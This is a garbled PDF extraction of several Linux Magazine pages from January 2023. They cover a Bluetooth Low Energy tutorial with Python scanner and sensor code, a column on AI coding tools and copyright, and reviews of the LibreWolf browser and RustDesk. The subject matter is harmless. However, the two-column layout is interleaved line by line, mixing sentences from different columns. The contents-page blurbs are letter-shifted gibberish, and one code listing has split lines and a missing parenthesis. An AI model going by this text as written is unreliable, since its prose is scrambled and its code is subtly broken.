terest group of more than 30,000 com- for just the sen-
panies for the development and distri- sors it is interested
bution of Bluetooth technology.) If you in when scanning
are interested in the technical details for advertise-
of BLE, you will definitely want to read ments. An app
this document. that wants to visu-
alize a heartbeat Figure 2: An example of the Heart Rate Profile from
Opening a Connection can specifically the Bluetooth SIG BLE Primer [2].
Central devices scan their environments connect to the ap-
for advertisements. If a central device propriate sensors. If everyone adheres to program development, you don’t nec-
finds something interesting, it opens a the standard, this even works across essarily need a Rasp Pi, but you defi-
connection to the peripheral device. As manufacturers. nitely need Python v3.7 or later.
soon as the connection is established, A logical grouping of several services Simply install Bleak using:
the peripheral stops sending advertising is known as a profile. The Heart Rate
messages. The whole process is known Profile, for example, also contains the pip3 install bleak

as the Generic Access Profile (GAP), Device Information Service (Figure 2).
which I’ll cover here briefly. The corresponding standard also defines You will also want to download the
Once connected, it is all about data two roles: Collector (client) and Sensor source code (including examples) from
exchange between the two devices. (server). In addition, it specifies other Bleak’s GitHub repo [4]. You’ll find the
The standard for this is the Generic At- more or less important details (e.g., that examples very useful as templates for
tribute Profile (GATT), which regulates the sensor’s device name can optionally your applications.
which bytes one device sends to the be overwritten). CircuitPython via Blinka is an alter-
other device via the wireless link. Even Within a service, there are several logi- native to Bleak. Installed on the Rasp
though the connection is always estab- cal attributes or functions known as Pi along with the appropriate BLE li-
lished from the central device to the characteristics in BLE speak. The Heart braries (Listing 1), this combination fa-
peripheral, this does not mean that Rate Service contains the mandatory cilitates communication with custom
data only flows in one direction. A bi- Heart Rate Measurement characteristic microcontrollers that also run Circuit-
directional data flow is also possible, and, optionally, the Body Sensor Loca- Python. While it will probably not
for example, using the universal asyn- tion characteristic, among others. Each cause you problems in many scenarios,
chronous receiver/transmitter (UART) characteristic in turn includes named Blinka does pose some limitations: The
service. BLE defines the terms server fields with the actual data. Raspberry Pi can only adopt the central
and client for this purpose. The client role with Blinka. The source code for
has read or write access to the server, Scan Me! the BLE libraries for CircuitPython can
which in turn can send data (with or After all of this theory, it’s time for also be found on GitHub, below the
without a response) to the client. In some simple examples. On the Rasp-
this case, the server has the definition berry Pi, you only need Python for Listing 1: Blinka with BLE
of the resources. this. The Bleak library provides an ab- $ sudo apt-get update
The heart rate sensor from the previ- straction layer that greatly simplifies $ sudo apt-get install python3-pip
ous example would be an example of a the application. Bleak stands for BLE
$ pip3 install \
server. The peripheral device that asks Platform Agnostic Klient (ouch), a nod
adafruit-blinka-bleio \
for the current time, on the other hand, to the fact that the package runs on
adafruit-circuitpython-ble
would have a client role after opening Linux, macOS, and Windows. So for
the connection. For its part, the client
can only hope that a central unit will Listing 2: Simple BLE Scanner
adopt the server role. 01 #!/usr/bin/python3

02 import time
Profiles and More 03 import _bleio
The service, a central concept in the BLE 04 import adafruit_ble
world, defines the data and behavior. 05 from adafruit_ble.advertising.standard import Advertisement
Each service has a universally unique ID 06 ble = adafruit_ble.BLERadio()
(UUID). The services standardized by 07 while True:
the Bluetooth SIG have 16-bit UUIDs, 08 print("Scanning...")
while private services use 128-bit UUIDs. 09 for adv in ble.start_scan(timeout=5):
An official document [3] defines all stan- 10 print(adv.address,adv.complete_name)
dardized UUIDs. For example, the Heart 11 time.sleep(10)
Rate Service has the UUID 0x180D.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 71

MAKERSPACE Bluetooth LE

Bluetooth name does not have to be

available. If you are interested in the ac-
tual byte sequence of the message, then
add repr(adv) to the print statement.
The Bleak installer installs the
bleak-lescan program in /usr/local/
bin/; it has the same functionality as our
simple BLE scanner. However, the logic
is hidden in a module, so it is not as re-
Figure 3: Scan output from the simple BLE scanner shown in Listing 2. vealing as Listing 2.
Figure 3 shows the output from the
Adafruit account. Again, there are simple BLE scanner. Besides my open
many useful examples. source smartwatch (Bangle.js) and
The program in Listing 2 implements a smartphone (HV10BB), several devices
very simple BLE scanner. The infinite from the neighboring apartment are also
loop in lines 7 to advertising.
11 scans for adver- Speaking of smartphones, there are
tisements every 10 several apps in the Apple and Google
seconds. For each stores to help you get started with BLE
match, the pro- and testing. These include the nRF Con-
gram outputs the nect for Mobile app by Nordic Semicon-
Bluetooth MAC ductor (Figure 4), which is the leading
address and name. manufacturer in Bluetooth chips. Nordic
However, the Semiconductor offers many useful

Listing 3: Transfer Sensor Data with UART

import time

import board

from adafruit_bme280 import advanced as adafruit_bme280

from adafruit_ble import BLERadio

from adafruit_ble.advertising.standard import

ProvideServicesAdvertisement

from adafruit_ble.services.nordic import UARTService

i2c = board.I2C()

#BME280 sensor:

bme280 = adafruit_bme280.Adafruit_BME280_
I2C(i2c,address=0x76)

[...]

BLERadio.name = "BME280_Sensor"

ble = BLERadio()

uart = UARTService()

advertisement = ProvideServicesAdvertisement(uart)

while True:

print("starting advertisement")

ble.start_advertising(advertisement)

while not ble.connected:

pass

print("connected")

while ble.connected:

measurement = "{0:0.1f},{1:0.1f},{2:0.1f}\n".format(

bme280.temperature,

bme280.humidity,

bme280.pressure/alt_fac

print(measurement,end='')

uart.write(measurement.encode("utf-8"))
Figure 4: The signal strength is measured by nRF time.sleep(10)
Connect.

72 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 Bluetooth LE MAKERSPACE

documents, tools, and software on the is a great choice for entry-level applica-
topic on its website [5]. tions because it is inexpensive and sup-
Another useful app is Bluefruit LE ports all common languages.
Connect by Adafruit. In addition to hard- The code turns out to be very compact
ware, Adafruit offers a very large collec- thanks to the CircuitPython libraries, but
tion of tutorials on all sorts of hardware- even with other programming languages
related IT topics. Bluefruit LE Connect the whole thing is unlikely to be much
and its practical application are very well more complicated. The logic is similar
documented. on the client side. Instead of advertise-
Special Bluetooth microcontrollers by ments, the control panel scans for UART
Adafruit, such as the Feather nRF52840 services, connects to the sensor, and
Express, are a great choice for interac- reads from the serial port. The complete
tion with the Bluefruit app. The app re- code for the server and client can be
ceives data and can also control the found in my project repository [6].
MCU, provided a suitable program is You may encounter some disadvan-
running there. tages of the UART
procedure if other
UART devices on the
The serial interface is one of the oldest network offer
interfaces in the IT world and has man- NUS. The client
aged to survive for many generations on program gets
continually evolving carrier technolo- around this by
gies. The UART service for BLE is the querying the ad-
Nordic UART Service (NUS). For many vertisement name
applications, UART plays the role of an BME280_Sensor, but
intermediate protocol. This is not ex- this is not an ele-
actly what the inventors of Bluetooth gant approach. It
had in mind, but it is simple. In particu- would make more
lar, developers can easily port existing sense to have a
applications. separate service
Listing 3 shows an example of trans- that defines the
ferring sensor data with UART. A micro- data structure.
controller reads a connected BME280 Figure 5 shows
sensor, bundles the results into a string, the advantage of
and writes the string to the serial inter- using UART, on the
face. An XIAO nRF52840 microcontroller other hand.

Listing 4: Advertisement with Data

01 import time

02 import board

03 from adafruit_bme280 import advanced as adafruit_bme280

04 import adafruit_ble_broadcastnet

05 print("This is BroadcastNet sensor:",

adafruit_ble_broadcastnet.device_address)

06 i2c = board.I2C()

07 #BME280 sensor:

08 bme280 = adafruit_bme280.Adafruit_BME280_
I2C(i2c,address=0x76)

09 [...]

10 while True:

11 measurement = adafruit_ble_broadcastnet.
AdafruitSensorMeasurement()

12 measurement.temperature = bme280.temperature

13 measurement.relative_humidity = bme280.humidity

14 measurement.pressure = bme280.pressure/alt_fac

15 print(measurement)

16 adafruit_ble_broadcastnet.broadcast(measurement)
Figure 5: The UART output as a plot with Bluefruit
17 time.sleep(10)
LE Connect.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 73

MAKERSPACE Bluetooth LE

Adafruit’s app can read UART data in CSV Conclusions

format without needing to understand the BLE is ideal for networking battery-
details of the data; you have a choice be- based sensors. The data sheet for the
tween text output or a plot for display combined CYW43439 Bluetooth and
purposes. A shared plot is not really suit- WiFi chip on the new Raspberry Pi
able for the BME280 sensor data. The val- Pico W, for example, specifies energy
ues for temperature, humidity (two-digit consumption for BLE that is a factor of
range), and pressure (four-digit range) 1,000 lower than for WLAN (TX: 234
are so far apart that the details are lost. to 351 μA versus 270 to 320 mA).
But if you have the right kind of data, fast Until BLE is enabled on the chip, you
visualization of the measured values via a will have to resort to other microcon-
UART plot proves to be very useful. trollers. You won’t get away with this
quite as cheaply as with the Pico W.
Broadcasts However, for around $10, the above-
Broadcasts are a special type of adver- mentioned XIAO nRF52840 BLE is
tisement. The peripheral device sends pretty affordable. Smartphones also
user data along with the advertisement. support the wireless standard, which
This means that other devices do not opens up other ideas for cool projects.
even have to establish a connection. For example, the Raspberry Pi could
Broadcasts are the only way to send data insist on a specific smartphone being
from one device to many others. nearby to release an application. Q Q Q
Broadcasts are popular in indoor navi-
gation using beacons or in museums. In Author
a museum, the advertisement typically Bernhard Bablok works at Allianz Tech-
contains a URL to a website that ex- nology SE as an SAP HR developer. When
plains an exhibit in more detail. If the he is not listening to music, riding his bike,
transmitter is close to the picture and or walking, he focuses on Linux, program-
transmits with low power, only suitable ming, and small computers. You can reach
apps will receive the information. him on [email protected].
For my example, the setup with the
microcontroller and the BME280 sensor Info
again provides a sample use case; List- [1] “Connect Pi Devices and a Smart-
ing 4 shows the matching implementa- phone with Bluetooth” by Bernhard
tion. This program, including the appro- Bablok, Linux Magazine, issue 264,
priate client that reads the data, can also November 2022, pp. 62-27
be found in the project repository [6]. [2] BLE Primer: https://www.bluetooth.
The AdafruitSensorMeasurement class, a com/bluetooth-resources/
subclass of Advertisement, has a set of pre- the-bluetooth-low-energy-primer/
defined fields that the program populates [3] Official UUIDs for standardized pro-
with the measurements from the BME280 files and services:
(lines 11 to 14). The command in line 16 https://btprodspecificationrefs.blob.
ultimately sends the advertisement. core.windows.net/assigned-values/
Any other devices can receive the ad- 16-bit%20UUID%20Numbers%20Doc-
vertisement by scanning – and even ex- ument.pdf
tract the data, if they know the internal [4] Bleak: https://github.com/hbldh/bleak
structure. If the fields of the AdafruitSen- [5] Nordic Semiconductor Developer
sorMeasurement class don’t match your Academy:
projects, just copy the class and adapt it https://devzone.nordicsemi.com/
for your needs. This works even if you [6] Git repository for this article: https://
don’t understand all the details. github.com/bablokb/ble-playground

QQQ

74 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 INTRODUCTION LINUX VOICE

One of the principles of the open source movement is “don’t reinvent the
wheel.” If an application does what you need to do, use it. Thousands of
free applications are available within the open source community, and if
you look around, you can probably find a tool that does exactly what you
want. But what if you can’t find a tool that does what you want? Another
principle of the open source movement is
“do it yourself.” This month’s tutorial on
converting a homegrown SQL database Doghouse – AI 76
to the more versatile JSON document Jon “maddog” Hall
format will give you some practical +HCPCTVKƒEKCNKPVGNNKIGPEGRTQFWEGUUQOGVJKPI
experience with data formats, as PGYYJQQYPUVJGPGYETGCVKQP!
well as Python APIs. Also in this
month’s Linux Voice, we LibreWolf 78
Erik Bärwaldt
introduce you to the LibreWolf
.KDTG9QNHCOQFKƒGF(KTGHQZDCUGFYGD
alternative web browser and
DTQYUGTUKORNKƒGUEQPƒIWTCVKQPCPFUVQRU
dust off the RustDesk remote
OCNYCTGCPFUR[KPI
access app.
RustDesk 82
Thomas Leichtenstern
Image © Olexandr Moroz, 123RF.com

(QTCNQPIVKOG6GCO8KGYGTCPF#P[&GUM
FQOKPCVGFVJGTGOQVGOCKPVGPCPEGUQHVYCTG
OCTMGV4GEGPVN[CPGYRNC[GTGPVGTGFVJG
UEGPGKPVJGHQTOQHVJGHTGGCPF)2.
NKEGPUGF4WUV&GUM
FOSSPicks 86
Graham Morrison
6JKUOQPVJ)TCJCOTGXKGYU6WPKPI9QTMDGPEJ
5[PVJ5VGNNCTKWOUCMG9QPFGT5JCRGTCPF
5CORNGDTCKP
Tutorial – SQL Database Migration 92
John Cofield
7UGC2[VJQP#2+VQOKITCVGCOWUKENKDTCT[
HTQO53.VQC0Q53.FQEWOGPVFCVCDCUG

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 75

LINUX VOICE DOGHOUSE – AI

MADDOG’S
Jon “maddog” Hall is an author,
educator, computer scientist,
DOGHOUSE
and free software pioneer
who has been a passionate If an artificial intelligence produces something new, who owns
advocate for Linux since 1994
when he first met Linus Torvalds the new creation? BY JON “MADDOG” HALL
and facilitated the port of
Linux to a 64-bit system. He
serves as president of Linux
International®. Artificial Intelligence and Ownership
ome free software people do not believe in intellectual The creation of new and unique code, by itself, should not

S property and copyrights. I am not one of them. I do be-

lieve that people have the right to say what happens to
their ideas and work, whether those are licensed as free and
cause many problems, because human programmers might look
at existing code, learn how to write new code, and then generate
new code from that knowledge. Students have been doing this
open source or whether they are closed and proprietary. for decades, but we also teach students about plagiarism and
As such, I do not “spit on” people who decide to close their how to create sandboxes so they do not copy the code verbatim.
code and sell it, but I do believe that the best way of produc- One issue, with both flesh-and-blood and inorganic intelli-
ing code for the end user is the free software model, which gence, is when the output is exactly (or very, very close) to
gives the end user the ability to maintain their system for as what was first written, and without the attribution requested
long as it is feasible. by many licenses. In many places, this is known as plagiarism
Recently there have been more and more people asking me and could be a violation of copyright law unless licensed and
about the effects of artificial intelligence (AI) on the program- with proper attribution.
ming job market. They ask me if I think that AI will take over and The user of Microsoft’s Copilot, which was trained through
put programmers out of work. My answer might not be popular, the use of FOSS source code, may not even realize that the
but if you take AI to its ultimate end, the answer must be “yes.” code which Copilot outputs is an exact duplicate of a FOSS pro-
I have been hearing about “artificial intelligence” since the gram, and the AI program might not even be “aware” that it cre-
1950s, with science fiction books like I Robot and movies and ated that exact copy. Therefore in a court of law, when the origi-
TV shows like Star Trek: Next Generation (STNG) having an- nal copyright holder brings a copyright infringement against the
droids, like Mr. Data. I have seen computers become faster, holder of the duplicate code, how does the Copilot user prove
logically larger, physically smaller, and more complex. I have that it was an innocent copy, and what happens to that copied
seen more people work on and produce what they consider ar- code? If Copilot is true AI, then even running Copilot with the
tificial intelligence, and I am sure that some day in the future same commands and the same input might not create the
we will find the algorithm that allows the computer we call the same output, making it difficult to prove that Copilot generated
human brain to learn and gain knowledge and apply that to in- the code in question.
organic intelligence (what I prefer to call AI). Does the AI system have access to all appropriate pat-
It is inevitable. ents? What happens when the AI system inserts a patented
However, we have to think about what happens when this ar- algorithm without knowing it? Of course this could happen
tificially intelligent artificial human (yes, there will probably first with a human coder too, but this type of filtering should be
be AI dogs and AI birds) creates something new. Who owns that built into something like Microsoft’s Copilot or any other AI
new thing? The artificial human? The “owner” of the artificial “creative” system.
human? And if the artificial human is owned, is that slavery? A person by the name of Matthew Butterick has been asking
Many of the same questions were asked and somewhat an- these questions, and many more [1], and it may behoove us to
swered with regards to the android Data on STNG, as well as in think about companies inserting these types of tools into plat-
many science fiction stories dating back to the 1950s. forms (such as GitHub) that FOSS developers use all the time. It
But we may have a crisis a lot sooner, even without an artifi- is not necessarily bad that developers use these tools, but there
cial human. should be some discussion and understanding regarding the le-
Microsoft’s Copilot, supposed AI software, has been trained gality and impact of using them. Q Q Q
on FOSS software that is both under copyright and under soft-
ware licenses. The authors of this FOSS software probably did Info
not consider or license the use of their software by AI, nor did
they consider that some AI “mind” would use their software to [1] Matthew Butterick on CoPilot: https://githubcopilotinvesti-
generate its own code, and this is causing consternation among gation.com/?fbclid=IwAR3gI83OQZ8Wsu4WUhTfYo8StjgsI
some FOSS developers regarding attribution. vHi_9gPvkhfOw5cZW1xfDxAsIlJzpY

76 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

LINUX VOICE LIBREWOLF

LibreWolf, the privacy-oriented Firefox alternative

Snoop Guard
LibreWolf, a modified Firefox-based web browser, simplifies configuration and
puts a stop to malware and spying.

ozilla Firefox is a web browser that options [2]. If you install from the repositories

M
BY ERIK BÄRWALDT
can be configured with great granu- and use the Flatpak, you will find a launcher in
larity, while respecting a user’s pri- your desktop menu when you are done.
vacy, unlike Google Chrome. This is why the Tor
Browser is also based on Firefox. If you don’t Getting Started
want to use the Tor network, but still want your At first startup, you will not notice much of a
privacy to be protected, setting this up involves difference from the original Firefox. The inter-
some fairly complex Firefox configuration work. face design does not show any serious differ-
Alternatively, you can let the LibreWolf [1] web ences at first glance. Of course, the preinstalled
browser, a modified Firefox, do the work for you. uBlock Origin extension, which filters unwanted
It does away with gimmicks in the default set- ads out of websites, located in the top right cor-
tings and has been thoroughly hardened by its ner of the program window next to the address
developers. bar, might catch your the eye.
LibreWolf is available for various Linux distribu- In addition, the default search engine is Duck-
tions, but also for macOS, OpenBSD, and other DuckGo instead of Google, which the original Firefox
operating systems. On Linux, various packages uses. DuckDuckGo is one of those search engines
are required for the install depending on the dis- that values its users’ privacy and blocks trackers. Li-
tribution. You also can use an AppImage or breWolf lacks the Pocket web application, operated
Flatpak package. In addition, you will find hints by Mozilla Corporation, which lets you save web
on the project page for all of the installation pages and articles on remote servers.
If you need to ad-
Figure 1: LibreWolf dialogs will be familiar to Firefox users, with a few variations. just LibreWolf’s lo-
cale, click on the
hamburger menu to
the right of the ad-
dress bar and select
Settings from the
drop-down menu that
opens. A configura-
tion dialog opens
that differs signifi-
cantly from its
Firefox counterpart.
Click on General in
the sidebar on the
left and then scroll
down the page on
the right to the Lan-
guage option. US
English is the default
language here.
If you are not
happy with that, you
can click on the Set

78 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 LIBREWOLF LINUX VOICE

Alternatives button to open a small dialog with typical tracking methods on websites, such as
the available languages. Click Select a language canvas fingerprinting.
to add, choose, say, Spanish as the language The options for managing cookies and web-
from the drop-down menu that appears, and site data are also stricter in LibreWolf than in
then click Add to the right. This puts the Span- the original: This data is automatically deleted
ish localization at the top of the selection dia- when the browser is closed, and there is no disk
log, and LibreWolf will use it as the default lan- cache in which the browser could cache sensi-
guage for menus and notifications in the future. tive data. LibreWolf does not save access cre-
A final mouse click on OK closes the overlap- dentials and passwords for individual websites
ping window. or form data by default, and therefore does not
automatically fill in the corresponding fields on
Protective Measures web pages. However, these options can be en-
The Settings dialogs available under General vary abled by checking the box, just like in Firefox. Li-
only slightly compared with Firefox (Figure 1). breWolf also deletes the history of websites vis-
However, LibreWolf does not let you customize ited during a session by default when the
the appearance of web pages in this dialog, browser is closed. This means that the history
some of which modify their color schemes to from previous sessions cannot be retrieved
display content. The browser makes this restric- when the browser is opened again.
tion due to the default security options, where
the ResistFingerprinting module is enabled. Re- Special Options
sistFingerprinting keeps users from being tracked The Synchronization category, where Firefox of-
based on specific web browser settings. fers data synchronization between multiple end-
Under Startup, LibreWolf only shows an Internet points, does not exist in LibreWolf. Instead, the
search on the startup screen. Shortcuts and ac- Firefox fork integrates a separate LibreWolf sec-
tivities, as well as notices from Mozilla (which tion into the configuration dialog, where you can
Firefox enables by default), are left out here. If re- make numerous security-specific adjustments
quired, further options can also be restricted: You (Figure 2).
can prevent sponsored links being displayed on Localization is still lacking here: The browser
the LibreWolf startup page – this is common currently only lists the options in this category in
practice in Firefox. In addition, pages saved to English. However, you can understand them even
Pocket do not show up on the startup page, be- with a limited knowledge of English. To the right
cause the developers have completely removed of each option, there is a link in the form of a
Pocket from LibreWolf. In the Search dialog, all question mark in a circle. Clicking on a the ques-
commercial offerings have been removed from tion mark link for an option opens a small
the search engine se-
lection, including the Figure 2: LibreWolf comes with its own configuration dialog where many security-related
Microsoft and Google options can be customized.
search engines.
The LibreWolf pro-
grammers have
made even more sig-
nificant adjustments
in the Privacy & Secu-
rity category. The En-
hanced Activity Pro-
tection group does
not have three op-
tions like Mozilla
Firefox does; instead
there is only the strict
protection variant.
Firefox only offers
standard protection
in this group by de-
fault. Activity tracking
protection in Libre-
Wolf also extends to
social network
scripts and various

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 79

LINUX VOICE LIBREWOLF

explanation below the option and often also automatic playback of multimedia content pro-
shows you optional settings. The parameters can vided on numerous websites by default. LibreWolf
be activated or deactivated by checking or un- also relentlessly blocks sponsored content and
checking the boxes to the left of each option. VPN ads from Mozilla. In addition, you are pro-
For savvy browser users, there are two inter- tected against pop-up windows and what can often
esting options at the end of the settings list. be annoying suggestions and advertisements
Clicking All advanced settings opens the manual when you enter search keys in the address bar. This
configuration console, which you can otherwise means that you can focus on the actual content.
only access by typing about:config in the brows- The LibreWolf project explicitly advises against
er’s address bar. Clicking Open user profile direc- using the software instead of the Tor Browser in
tory opens the file manager with the user profile the context of the Tor network. Although both web
directory. The root directory with all files and browsers are based on Mozilla Firefox, the Tor
subdirectories appears. Experienced users can Browser has some settings explicitly adapted to
use these files to repair damaged profiles. the Tor network. The different configuration of Li-
You can access the profile manager, like in breWolf, in conjunction with the Tor network, can
Firefox, by typing about:profiles in the browser’s open security holes that allow attackers to remove
address bar. The profile manager that opens gives the anonymity of the respective user and spy on
you an easy option for creating, deleting, and their browsing behavior.
modifying user profiles.
Conclusions
Cryptography LibreWolf removes a lot of tedious configura-
Besides the options you can manage as a user in tion work for users who value security and pri-
the Settings dialogs, LibreWolf also comes with vacy. The browser already enables most of the
some improvements under the hood compared to security options in the default settings, whereas
Firefox. For example, the browser disables SHA-1 you have to enable them manually in Firefox in
certificates because the underlying algorithm has various settings dialogs. The developers have
known security vulnerabilities. By default, Libre- also completely removed other options in Libre-
Wolf also uses HTTPS-only mode, so that strong Wolf from the outset, such as telemetry set-
transport encryption is always enabled when call- tings, which security-conscious users must
ing up web pages. first disable in Firefox. Users won’t miss out on
Additionally, the software integrates protection new features, because the browser follows
against homographic attacks, where attackers Mozilla in terms of updates, and extensions are
use similar-looking characters in domain names fully compatible. All told, LibreWolf is a far bet-
to lure users to fake websites. The browser blocks ter choice for security-conscious friends of the
content that uses a certificate and fails digital sig- Mozilla browser. Q Q Q
nature validation with an OCSP responder. How-
ever, this setting can be modified in the LibreWolf Info
category of the Settings dialog [3].
[1] LibreWolf: https://librewolf.net/

Features [2] Installation instructions:

Where possible, the developers have removed dis- https://librewolf.net/installation/
tracting elements from the browsing experience. [3] Improved features and settings:
For example, LibreWolf disables annoying https://librewolf.net/docs/features/

QQQ

80 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

LINUX VOICE RUSTDESK

A free alternative to TeamViewer and AnyDesk

Universal Connector
For a long time, TeamViewer and AnyDesk dominated the remote maintenance
software market. Recently, a new player entered the scene in the form of the free
and GPL-licensed RustDesk. BY THOMAS LEICHTENSTERN
SH has been considered the gold standard The project, which was launched only about one

S for managing remote machines at the

command line on Linux for years. If you
prefer a graphical approach, you can use, say,
and a half years ago, is released under the GPLv3
and is freely available to everyone. The sources
and binaries can be found on RustDesk’s GitHub
VNC. As long as this all happens on your organi- page [2]. The software, which – as the name sug-
zation’s network, there are rarely any problems. gests – is written in Rust, is available for many dif-
Access to other computers via a public network is ferent platforms, including Linux, macOS, Win-
different. Because the remote stations on private dows, Android, and iOS.
networks cannot normally be easily reached via the The feature set should be fine for most use
Internet, an go-between is required, such as Team- cases. Besides transferring the desktop, the tool
Viewer or AnyDesk. This is a public server that lets you transfer files, share the clipboard, and
knows the clients’ IDs and how to reach the clients. pass through audio. On top of this, RustDesk inte-
But these two candidates have two issues in com- grates a chat function with which you can ex-
mon: The sources are not open, and the commercial change information with the other party – useful if
versions are quite expensive. For example, Team- you work in support.
Viewer charges just under $40 per month for a sin- A connection server, which you need for access
gle-user license, while AnyDesk charges about $15. via the Internet, is provided by the project free of
charge as a service. On top of this, it also offers
Free Alternative software that lets you host a connection server
RustDesk [1], on the other hand, shares its sources yourself. This means that you can design your re-
and is free of charge – even for commercial use. mote infrastructure completely independent of
third-party computers or companies.

Installation
The project provides clients for openSUSE, Man-
jaro, Fedora, and Ubuntu, among other Linux sys-
tems, on its website [3].
After downloading the right version for your
system, you can install the software using your
distribution’s package manager. On Ubuntu, just
download and a click on the DEB file to start the
install. It is noticeable that the package manager
drags in quite a large number of dependencies
from the repositories.
The software sets up an auto-starter during the
install. This means that it loads automatically
each time the computer reboots, and you can ac-
cess the computer externally. RustDesk always
runs with the rights of the user who uses it.

First Launch
After successful installation, you can launch the
Figure 1: When first launched, RustDesk comes up with a clear-cut and tidy interface. program on Ubuntu via Others | RustDesk. Other

82 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 RUSTDESK LINUX VOICE

distributions may use different paths here. For

help finding the path, you can search for Rust-
Desk in the menu.
The user interface (Figure 1) is very tidy and
clearly arranged. When first launched, the appli-
cation generates a random, nine-digit ID, which
it displays in the left column of the window
under ID. You can use this number to let other
clients access your computer. Below it, you will
see the Password field. The software assigns a
random password here. If you want to specify
your own password instead, click the pencil
icon to the right of the asterisks. The only re-
quirement for the password that the tool ex-
pects is a length of at least six characters. To
view the password, just hover the mouse over
the field with asterisks.
In the central area of the window, there is a
Control remote desktop box at the top. This is
where you enter the ID of the other end of the
connection. The area below this is used to man-
age connections. On the left, you will find the Figure 2: Sorry, wrong
last sessions you opened in Last Sessions, with Headless Operation number: The infrastructure
the Favorites next to them, and the Found tab Operating a computer without peripherals is no for centralized storage of
one door further down. This is where the soft- problem as long as you manage it via terminals. the address book does not
ware lists the computers on the local network But the situation is different if you want to transfer currently exist.
with an active RustDesk instance. The Address the desktop. In this case, Linux requires a con-
Book tab lets you store the connections cen- nected monitor – otherwise the transfer either
trally on the project server, making them avail- fails completely or the screen remains black. This
able from any computer. But, in our lab, we only can be remedied by a dummy configuration of the
saw messages stating that the specified host Xorg Server [4]. However, because many systems
was unknown (Figure 2). now rely on Wayland, the setup can be a pain.
Clarification of this issue came from reading An HDMI dummy plug [5], about $10 for two,
the FAQ on GitHub, which states that the server can help you here; you just need to plug it into
page is not yet operational, whether you host it the HDMI socket instead of the monitor. It fools
yourself or use the public server. the system into thinking that a monitor is

Figure 3: The left column shows the local folders and files, the right column the ones on the remote computer. The transfer status is shown on the far right.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 83

LINUX VOICE RUSTDESK

Figure 4: You can use the

screen icon in the menubar plugged in, which means that the computer’s file or Connect to the remote desktop. In the first
to set the quality and size of desktop content can be easily transferred using case, after entering the password of the connec-
the transferred image. standard remote maintenance tools. You can tion partner, a file manager opens, displaying the
set the resolution between 720x576 and local files and directories on the left side and those
4096x2160 pixels (4K), and the refresh rate is of the remote computer on the right (Figure 3).
60Hz. You do not have to configure the system To start a transfer from the local computer to
for this; the connector works like a monitor via the remote system, click on the desired files or di-
plug and play. rectories on the left. For multiple selections, fol-
low the usual steps and press Ctrl at the same
Connecting with an External Computer time. After that, pressing Send at the top will start
To connect with a remote computer, enter the ID of the transfer.
the desired computer in the Control Remote Desktop Transferring files from the remote computer to
box. Now choose whether you want to Transfer a your local computer is similar, only here you need
select the data in the right column and then press
Receive. The transfer rates on the local network
were about the same as the bandwidth available
between the computers. The connection band-
width is likely to be the limiting factor for connec-
tions via the Internet.
To access the remote desktop, press Connect.
After a short wait, a password prompt appears.
Now enter the password set by the remote com-
puter. You can optionally save the password to
eliminate prompts in the future.
The desktop of the remote computer you are
working with now appears in the window as if
you were sitting in front of it (Figure 4). Rust-
Desk uses the default screen resolution of the
remote computer. Depending on the resolution
of the local system, there may be problems with
the display if it is too large or too small. If this is
the case with your system, click on the screen
icon in the top menu of the window. In the
menu, you can then choose between Original,
Figure 5: You can access the advanced configuration of the RustDesk client by clicking on Stretch, or Shrink. Enable the top item, Adjust
the three vertical dots. Window, to adjust the desktop size to that of the

84 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 RUSTDESK LINUX VOICE

window, which you can drag to make it larger or makes working with it more diffi-
smaller as desired. cult. The web client does not
The same menu lets you set the balance be- have a file transfer mode unlike
tween the response time and image quality. The the desktop variant.
Custom option gives you a free hand: You can set
the weighting of the bitrate and the quantizer using Own Server
slide tools. Besides the many client variants,
To display the window contents full screen, click the project also offers its own
on the small rectangle in the menu at the top. In relay server. It includes both hbbs
this mode, RustDesk will then show the menubar (RustDesk ID/Rendezvous
again as soon as you touch the top of the screen Server) and hbbr (RustDesk
with the mouse pointer. Relay Server) components lo-
Clicking on the speech bubble icon opens a cated in the same archive. How-
message window that works like a messenger. ever, the documentation of this
The other person can read what you type and re- software is limited to the bare
spond if necessary. essentials, which makes config-
uration difficult. Basically, you
Extended Configuration just need to launch the two com-
You can access the advanced configuration by ponents (Listing 1).
clicking on the three vertical dots next to ID (Fig- On the client side, enter the cor-
ure 5). This lets you specify, for example, whether responding IP address in ID/Con-
the connection partner can use the keyboard, nection Server. The project recom-
transfer files, or if a shared clipboard is available. mends using PM2 to manage the
On the local network you also have the option server components. For step-by- Figure 6: The Android app supports remote
of addressing remote computers by IP address step instructions on basic client control of other computers as well as access to
instead of by their IDs. To do this, select Enable and server configuration, see the the device itself.
Direct IP Access. If you click on the pencil next RustDesk documentation [7].
to the dot, then a field appears where you can
specify a separate port. By default, RustDesk Conclusions
uses port 21118. In daily operation, there were no issues with Rust-
Desk during the test phase. The software per-
Building Bridges forms the basic functions just as well as AnyDesk
Like I mentioned earlier, RustDesk not only or TeamViewer. Transferring the desktop required
gives you software for desktop systems, but about the same transfer rates as the other candi-
also for mobile devices running Android and iOS dates, and no crashes or software errors oc-
via the respective providers’ app stores. The curred. However, there is one point of criticism
apps can act as a client or server, allowing con- that the project needs to deal with: The documen-
nection to remote PCs and access to the mobile tation, especially for the server, leaves much to be
devices from them (Figure 6). In testing, this desired in many places. Q Q Q
worked smoothly in both directions, although
operating a remote PC via the Android app does
take some practice. Info
Alternatively, the project also offers a web cli- [1] RustDesk: https://rustdesk.com
ent [6] for establishing a connection. The soft-
[2] RustDesk on GitHub:
ware, which is still beta, supports access to the
https://github.com/rustdesk/rustdesk
corresponding devices in a web browser. The re-
